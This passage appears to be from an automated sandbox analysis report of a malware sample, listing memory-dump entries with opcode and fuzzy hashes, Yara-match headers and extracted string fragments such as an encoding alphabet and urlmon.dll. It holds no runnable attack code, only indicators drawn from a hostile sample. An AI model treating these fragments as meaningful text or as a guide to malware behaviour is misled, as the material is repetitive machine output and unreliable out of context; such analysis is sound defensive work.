                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Zu
                                                                                                                                                              • API String ID: 0-568468114
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1e25bc1f24a6a9702a58a6d98d543f02ff80c740c951fd81e11122e53a9cc05e
                                                                                                                                                              • Instruction ID: 86fa807ab2a2a638bdd7f222603826c858488eb5bf5cb98694d901c7ba1a6866
                                                                                                                                                              • Opcode Fuzzy Hash: 1e25bc1f24a6a9702a58a6d98d543f02ff80c740c951fd81e11122e53a9cc05e
                                                                                                                                                              • Instruction Fuzzy Hash: 4641EB73A096614BC311EA7CE8C94FEFBB9EB9612071407EFEC88CB612D6225805C3D1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 77bfa915346c419215ced3a1da88a55352111c9f3a4ccfcb181a3fe0681f6cd5
                                                                                                                                                              • Instruction ID: bbdff18ab6d15b31cc1f3103876119e3794e4fba386334a2f31d4837770c5cc2
                                                                                                                                                              • Opcode Fuzzy Hash: 77bfa915346c419215ced3a1da88a55352111c9f3a4ccfcb181a3fe0681f6cd5
                                                                                                                                                              • Instruction Fuzzy Hash: A5410CB1D11228AFDB04CF99D885AEEBBBCFF49710F10415AFA14E7240E7B59640CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f8be4d1f2cea7b9a440d70b5c671d4aabf6c7a6c2c0545364472d6a9c976149b
                                                                                                                                                              • Instruction ID: 4fe5871c3ab5f3d2ca4ba6a491cbb6e6f22c5da71ab52371442bb4825455ecff
                                                                                                                                                              • Opcode Fuzzy Hash: f8be4d1f2cea7b9a440d70b5c671d4aabf6c7a6c2c0545364472d6a9c976149b
                                                                                                                                                              • Instruction Fuzzy Hash: 0C21263664432426CB20AE74EC8CFFF73ADFF94300F844599EC1982181FA709A4087A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6a3a75f8f8c99e9db62e84433dfe905f4f68b5c62c2740eb3eab93c658fdb7eb
                                                                                                                                                              • Instruction ID: 9815d9f4e2cd8895da4731d848f9db90e078e7d131c1f50568ac6c2542fa6555
                                                                                                                                                              • Opcode Fuzzy Hash: 6a3a75f8f8c99e9db62e84433dfe905f4f68b5c62c2740eb3eab93c658fdb7eb
                                                                                                                                                              • Instruction Fuzzy Hash: 23213736A4032466CB60EE74EC8CFFF73ADFF94300F944559EC1A92181FA70964087A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                                                                                                              • Instruction ID: 2bbc2bed355145f8590d30e5ba2995e494d066c23b2a374156a862c225f0a808
                                                                                                                                                              • Opcode Fuzzy Hash: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                                                                                                              • Instruction Fuzzy Hash: AB21C2B2201609BFEB44DF98DC84EEB73ADAF8C714F008608FA5D93240D634ED518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                                                                                                              • Instruction ID: 114b275eca114cd826b3f53511255a9ee1ce0d4e2632294dd5b78522872b506e
                                                                                                                                                              • Opcode Fuzzy Hash: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                                                                                                              • Instruction Fuzzy Hash: 0221C6B2200509AFDB14DF98DC84EEB73ADAF9C714F14860CFA5D97240D634ED118BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 77c44d9cf2f5d1790beee601bcb1eafad6d4b41a0c6ae96533e94ae82c8d738f
                                                                                                                                                              • Instruction ID: ede1fb3b5c639ae91c88703afb5300f914adc52c9172cca651a6d28748c406c9
                                                                                                                                                              • Opcode Fuzzy Hash: 77c44d9cf2f5d1790beee601bcb1eafad6d4b41a0c6ae96533e94ae82c8d738f
                                                                                                                                                              • Instruction Fuzzy Hash: 2A1186723802257BF720AE59EC82FAF375CAB94F50F244015FF08AA5C0D6A5F81147B9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 685d10aecbdde073ab4b8ca095e36f9a4faed7e65b52c8bb5d024b29a357888a
                                                                                                                                                              • Instruction ID: ea168432bf122018097493d5dfd6433c1bad4ee893c065b63ae32ae7907ea81a
                                                                                                                                                              • Opcode Fuzzy Hash: 685d10aecbdde073ab4b8ca095e36f9a4faed7e65b52c8bb5d024b29a357888a
                                                                                                                                                              • Instruction Fuzzy Hash: BD112336B816B027D7201559AC08BAF779CDFD1A60F1D40BDFE4DAB242F564A90142A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9c2577be4323bfdbc0df53996fd9425dba7eb0bbd745f547d46a316b77b4a328
                                                                                                                                                              • Instruction ID: 658d231cda8396624473de488c464d0110a8616f515973d32fbf7885fd4d1042
                                                                                                                                                              • Opcode Fuzzy Hash: 9c2577be4323bfdbc0df53996fd9425dba7eb0bbd745f547d46a316b77b4a328
                                                                                                                                                              • Instruction Fuzzy Hash: 2911E4B2200619BFDB14DF99EC84EEB73EDAF9C704F008518FA5D93241D634AD128BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bf31f2e876076f5fc3152dc6755acefe997ad3595d93b97032193964a71d2a17
                                                                                                                                                              • Instruction ID: 7eac730c57b2d896436e6aaca517e90c0133a61907340774b53b1c0274a2fd5d
                                                                                                                                                              • Opcode Fuzzy Hash: bf31f2e876076f5fc3152dc6755acefe997ad3595d93b97032193964a71d2a17
                                                                                                                                                              • Instruction Fuzzy Hash: 8901BE72F401247BF710D958FCC5FBEB36CEB95610F14459AFD04DB240E565AD1057A2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 50f5aeb6ac8e6c04103c304e34e9c45e73a5f0a10f8a5923c71f0f1c7171ac71
                                                                                                                                                              • Instruction ID: d9d95eebe553a8f436649be2858521e5ddbc7f4f7671c877a464513d7d0b051f
                                                                                                                                                              • Opcode Fuzzy Hash: 50f5aeb6ac8e6c04103c304e34e9c45e73a5f0a10f8a5923c71f0f1c7171ac71
                                                                                                                                                              • Instruction Fuzzy Hash: D711F8B2200655BBDB14EF98EC45EAF73ADEF99610F008509FA5997280D630AD118BB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f3243384225820ad1c8ae8e35010212473341618229bf924b9a1e6d28cd17d5f
                                                                                                                                                              • Instruction ID: d8e45febc9e078c97b5d3cb0a669e247efb370a5b630a5e64b2a2b3069d2a688
                                                                                                                                                              • Opcode Fuzzy Hash: f3243384225820ad1c8ae8e35010212473341618229bf924b9a1e6d28cd17d5f
                                                                                                                                                              • Instruction Fuzzy Hash: C511F1B6E0121DAF9B00DFA9D9409EFB7F9FF59210F04416AE915F7200E7749A148BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a425dcb783a96bda6e108b866a95bd3306fcf022b66d14127879edb147a3b99d
                                                                                                                                                              • Instruction ID: a7958b0d2cc79083ce00a163e3b0b23707a21018835e4deb69c04b06539eadec
                                                                                                                                                              • Opcode Fuzzy Hash: a425dcb783a96bda6e108b866a95bd3306fcf022b66d14127879edb147a3b99d
                                                                                                                                                              • Instruction Fuzzy Hash: 18111FB6E1111CAF9B00DFE9D9409EFB7F8FF58200F04416AE919E3200E7705A048BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0cf881d077c766d7f979b98e9aacdb37a359468740e04bac9ba967b3424891b9
                                                                                                                                                              • Instruction ID: f95fc7443b93b6a272d16004dd8693190e16c7b326ef0ff4a8ede8a51005e8b2
                                                                                                                                                              • Opcode Fuzzy Hash: 0cf881d077c766d7f979b98e9aacdb37a359468740e04bac9ba967b3424891b9
                                                                                                                                                              • Instruction Fuzzy Hash: 3701C0B6B402387BE710AA64EC4DDFFB36CEF65610F104296FD1893240FA64AE5147E5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                                                                                                              • Instruction ID: 32bf9b0e20666ffd44c5d07842495e68c84d324a21e7d2ff5e286991593da1dc
                                                                                                                                                              • Opcode Fuzzy Hash: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                                                                                                              • Instruction Fuzzy Hash: 3811F7B6204118BBDB04EE99EC81EDB77ADEF8C710F048109FA0DE3241DA30ED118BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cfddb0bb8398ed53b7ed28904f967a14f64f34fb564dbe3c523f0df6d73801d2
                                                                                                                                                              • Instruction ID: 99c0c97c7709574d953fa0d4b3e1fec8bc58289610ffa5814a27b42b6d0c57f8
                                                                                                                                                              • Opcode Fuzzy Hash: cfddb0bb8398ed53b7ed28904f967a14f64f34fb564dbe3c523f0df6d73801d2
                                                                                                                                                              • Instruction Fuzzy Hash: 0F015E71200654BBEA10AA54DC48FAF73ACEF85711F00840DFA5897240D774BD018BB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b4f69a8d46f1c1e083d8d8f5b720278c3997c04ec6b4cabcc7c8d9501a53dbf6
                                                                                                                                                              • Instruction ID: 4eaa65c2bb9adef9f104d344f18bb3cae740e49b7f346ec44cfa03459f4f1394
                                                                                                                                                              • Opcode Fuzzy Hash: b4f69a8d46f1c1e083d8d8f5b720278c3997c04ec6b4cabcc7c8d9501a53dbf6
                                                                                                                                                              • Instruction Fuzzy Hash: EF015EB22002147BE610AA58DC48EBF73ACFF95310F40881DFA9997240DB74BD1587B5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 61361677125ca5c464489a719f6ea5ad326e7d657cd1450b1f51e9fa995a4911
                                                                                                                                                              • Instruction ID: c829388afb090989a604eb4fed1b499cd258e34e493c8121ce30a1b7124a4bf3
                                                                                                                                                              • Opcode Fuzzy Hash: 61361677125ca5c464489a719f6ea5ad326e7d657cd1450b1f51e9fa995a4911
                                                                                                                                                              • Instruction Fuzzy Hash: 0311E8B1D242289F8B40CFAD94841EDBFF8FB09620B10825BE868E7240D7B186418FD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                                                                                                              • Instruction ID: 6448adf3370f17e9ffff4c0acca1563b3f8a329a1d0ada0fd07cae8e0d173c26
                                                                                                                                                              • Opcode Fuzzy Hash: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                                                                                                              • Instruction Fuzzy Hash: 0B01C0B2201208BBDB44DF89DC84EDB77ADAF8C710F008208FA09E3240DA30EC518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f86f1802c4487a8383a93b9429c05b4bfacb1b61ada847f2ddd72e82896268b1
                                                                                                                                                              • Instruction ID: 4b77cd379624070139938acece5a7fe96303852b08baf32281c5b30ee33ce4f6
                                                                                                                                                              • Opcode Fuzzy Hash: f86f1802c4487a8383a93b9429c05b4bfacb1b61ada847f2ddd72e82896268b1
                                                                                                                                                              • Instruction Fuzzy Hash: E601DBB2D11219AEDB40DFE8D941AEEBBF8BB18200F14456AD916F3240F77556048FA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 24fce06f69b3e886d7ecd5ca67a116bd849139378026a2bb1b24c1e30855f722
                                                                                                                                                              • Instruction ID: 6f88ea5bdd2c9f141bc75dde82cbafa1e6ea94b0f1785205151dac4b8ec4774f
                                                                                                                                                              • Opcode Fuzzy Hash: 24fce06f69b3e886d7ecd5ca67a116bd849139378026a2bb1b24c1e30855f722
                                                                                                                                                              • Instruction Fuzzy Hash: FCF0A77360821667E7105E5DFC84BDEB7DCEB94234F641222FD5CC7281E672D45183A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                              • API String ID: 0-3248090998
                                                                                                                                                              • Opcode ID: e88199dca5e4d067ebff1195c13137bd4ea258bea35e9c34758cd38092c3f820
                                                                                                                                                              • Instruction ID: a19702dea592be39b514e6827340a69c97a035bda7919558258864c46698782a
                                                                                                                                                              • Opcode Fuzzy Hash: e88199dca5e4d067ebff1195c13137bd4ea258bea35e9c34758cd38092c3f820
                                                                                                                                                              • Instruction Fuzzy Hash: 9F9110F08052A98ECB118F59A4603DFBF71BB95204F1581E9C6A97B243C3BE4E85DF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                              • API String ID: 0-3248090998
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                              • API String ID: 0-1002149817
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$$$%$)$)$5$>$B$E$F$F$H$J$Q$T$g$h$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                              • API String ID: 0-881177885
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                                              • API String ID: 0-3236418099
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                                              • API String ID: 0-3236418099
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
